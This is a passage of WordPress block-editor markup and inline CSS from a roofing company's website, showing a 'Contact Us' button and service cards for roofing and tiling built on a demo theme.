-->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"63ddace3-1c17-4204-b706-d0b433daef69\"} -->\n<style type=\"text/css\"> .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-63ddace3-1c17-4204-b706-d0b433daef69\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"3d60bfc1-b9eb-4ec8-9435-1256841854bd\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"056cb894-6454-42df-942f-dfc188516e3c\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-056cb894-6454-42df-942f-dfc188516e3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"50e69a29-82aa-4d9a-8393-5d7206f14a34\"} -->\n<style type=\"text/css\"> .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-50e69a29-82aa-4d9a-8393-5d7206f14a34 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"8084ee78-5871-48ad-a7a9-1e3b52164921\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8084ee78-5871-48ad-a7a9-1e3b52164921\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"dd2fb7db-992d-423c-ac16-d676e4901ec9\"} -->\n<style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a new roof replacement from Dunrite.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"02734963-0b31-4312-8c71-a66457a80c8b\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-02734963-0b31-4312-8c71-a66457a80c8b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"180058dd-db27-45c4-a0de-f8703e853737\"} -->\n<style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 